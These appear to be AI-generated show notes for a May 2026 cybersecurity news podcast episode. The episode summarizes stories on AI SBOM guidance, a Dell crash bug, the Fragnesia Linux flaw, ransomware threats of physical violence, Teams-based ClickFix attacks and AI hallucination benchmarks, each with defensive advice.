May 15's Top Cyber News NOW! - Ep 1133

At a glance

G7 nations released AI software bill of materials guidance; Dell's support software is crashing Windows systems; Linux kernel vulnerabilities continue to spawn dangerous successors; ransomware operators are now making physical threats against employees and their families; and AI-driven vulnerability discovery is accelerating past human ability to patch, creating a dangerous game of patch-and-exploit cycles.

Stories covered

What's the G7 releasing for AI software transparency?

What happened: The G7 (US, Canada, Japan, Germany, France, Italy, UK) plus the EU published software bill of materials guidance specifically for AI systems. An SBOM is a machine-readable manifest cataloging every component, library, and dependency in software, similar to nutrition labels on food products.

Why it matters: SBOMs for AI expose what's actually baked into your LLMs and AI tools—critical for tracking vulnerabilities and supply chain risks. The Log4j incident in 2021 proved how dangerous it is when organizations don't know what software they're running. Standardization signals convergence; we're moving out of the wild west toward coherent best practice.

What to do: If you're evaluating or deploying AI tools, start asking vendors for SBOMs. This is an awareness control, not a defensive one, but it's your first look at what you're actually running.

---

Is Dell's support software causing widespread Windows crashes?

What happened: Dell confirmed that SupportAssist Remediation Service version 5.5.16.0 is causing blue screen of death crashes on Windows systems. The workaround is to disable or uninstall the service.

Why it matters: A vendor-supplied system tool causing denial of service on endpoints is a visibility and operations problem for SOCs. End users can't work. If you're a Dell shop, your help desk is going to get slammed with BSOD tickets if you haven't addressed this.

What to do: If you run Dell endpoints, share this alert with your help desk and endpoint management team. Consider scripting removal via PowerShell or group policy rather than having users manually uninstall. If you're not using SupportAssist, remove it to reduce attack surface.

---

Why is a Linux kernel vulnerability coming back as Fragnesia?

What happened: A new Linux kernel local privilege escalation flaw called Fragnesia has been discovered. It emerged as an unintended side effect of patches shipped to fix the original Dirty Frag vulnerability—researchers found the patch itself introduced a new exploitable gap.

Why it matters: This illustrates a dangerous cycle: threat actors can analyze patches in real time to discover new flaws introduced by the fix. Combined with AI-accelerated vulnerability discovery, we're entering a doom loop of patch-analyze-exploit-patch. If you run Linux servers, you're in scope.

What to do: Patch immediately. Document both Dirty Frag, CopyFail, and now Fragnesia in your Linux vulnerability management workflow. Expect this pattern to continue for the next 3–5 years as AI discovers decades of dormant bugs and patches introduce new ones.

---

Are ransomware gangs now threatening physical harm to employees?

What happened: According to security firm S-Paris, 40% of global ransomware attacks in 2025 included threats of physical violence against employees and their families. In the US, this number rises to 46%. Attackers use stolen PII—home addresses, SSNs—to call individuals directly. Some threaten machinery sabotage (robots, conveyor belts) to demonstrate control and coerce payment.

Why it matters: This is no longer just a data breach or financial threat; it's personal terrorism. Social engineering escalates from phishing to extortion. The FBI reports most perpetrators are between 17–25 years old, recruited or employed by financially motivated criminal gangs. Gig economy workers are being paid $1,000 to deliver printed threats to homes.

What to do: Educate employees that data breaches will result in this type of outreach and that they should report it immediately to law enforcement and your incident response team. Standard identity theft protection won't help; this isn't identity theft, it's weaponized exposure. Assume all PII is compromised and plan for contact campaigns.

---

Is the UK rewriting its cyber crime law?

What happened: The British government announced plans to rewrite the Computer Misuse Act of 1990 to shield security researchers. The 36-year-old law creates legal uncertainty around legitimate activities like vulnerability research, penetration testing, and threat intelligence operations because it predates cloud computing, ransomware, and modern offensive security.

Why it matters: Researchers and bug bounty programs have long faced legal ambiguity in the UK. The US established safe harbor through responsible disclosure and formal bug bounty programs; the UK is now following suit. This removes friction for coordinated vulnerability research and industry-led threat intelligence.

What to do: If you work in UK-regulated sectors or partner with UK researchers, monitor this legislative update. Expect clearer legal protections for authorized security testing once this passes.

---

How many vulnerabilities is Microsoft on pace to patch this year?

What happened: Microsoft issued patches for 130+ vulnerabilities on Patch Tuesday and has already patched 500+ in 2026. The company is on pace to break its annual record. Representatives acknowledge that AI tools are driving surge in vulnerability discovery across the industry and expect releases to trend larger.

Why it matters: This is concrete evidence of AI-accelerated vulnerability discovery. NIST has already stated it cannot enrich all reported vulnerabilities due to sheer volume. Expect logarithmic growth in vulnerability counts through 2026 and 2027 as AI backlogs 25 years of unreviewed code.

What to do: Patch velocity is going to become your biggest operational challenge. If you're not automating patch testing and deployment, start now. Prioritize based on exploitability signals rather than trying to patch everything. Plan for 600+ patches from major vendors annually.

---

Are attackers using Microsoft Teams to breach corporate networks?

What happened: Initial access broker Kong Tuki is using Microsoft Teams to impersonate IT and help desk staff, tricking employees into pasting PowerShell commands that deliver remote access trojans. Attackers gain persistent access in as little as 5 minutes using ClickFix-style attacks (fake CAPTCHA prompts). They register additional devices to MFA once inside, completely bypassing multi-factor authentication.

Why it matters: Teams is ubiquitous and trusted; impersonation is trivial. ClickFix attacks have been suppressed for months but are clearly resurging. Once attackers gain a legitimate user account and register a device to MFA, they own that user—ransomware operators then buy that access and deploy file encryption.

What to do: Deploy awareness training immediately: IT will never ask you to run PowerShell via chat. Require out-of-band verification for any help desk request. Disable PowerShell execution for non-privileged users if possible. Monitor for PowerShell execution reaching external endpoints (Dropbox, etc.). Look for suspicious device registrations to MFA. Treat intra-Teams impersonation as a persistent threat.

---

Can AI hallucinations compromise security operations?

What happened: The Artificial Analysis omniscience benchmark tested 40 AI models and found 36 were more likely to provide confident incorrect answers than correct ones on difficult questions. AI models lack a mechanism to recognize uncertainty and instead generate the most probable response based on training data patterns.

Why it matters: As AI assumes larger roles in SOC triage, threat intelligence, and infrastructure decision-making, hallucinated answers can look authoritative. Organizations risk treating false conclusions as fact and making security decisions based on fabricated data.

What to do: Never treat AI output as ground truth. Verify all critical findings with human review and reference material. Use purpose-built AI models for specific domains rather than general LLMs for specialized security questions. Establish confidence-level scoring for AI recommendations and escalate low-confidence outputs. Don't replace analysts with AI; use AI to augment analyst capability and speed up routine work.

---

Key takeaways

• Patch velocity is your new enemy: Microsoft alone is on pace to exceed 500 patches in 2026; expect logarithmic growth as AI discovers decades of dormant vulnerabilities. Automation and exploitability-based prioritization are now mandatory.

• Threat actors are escalating from digital to physical: 40%+ of ransomware campaigns now include direct threats to employee homes and families. This is weaponized exposure, not identity theft, and awareness training must reflect this reality.

• Patch-patch-patch cycles create new holes: Fixes for Dirty Frag spawned Fragnesia. Threat actors analyze patches in real time to find new exploits. Expect this to be the norm for 3–5 years.

• Teams-based social engineering is resurging: ClickFix attacks impersonating IT are gaining traction again. Out-of-band verification and PowerShell controls are your fastest mitigations.

• AI outputs are vulnerabilities until verified: 36 of 40 AI models tested were more likely to hallucinate confidently than answer correctly on hard questions. Treat every AI finding as unverified until human review confirms it.

---

Topics covered

Show notes generated from the live transcript using AI on Fri, 15 May 2026 16:23:34 GMT. Errors? Open the YouTube replay for the source of truth.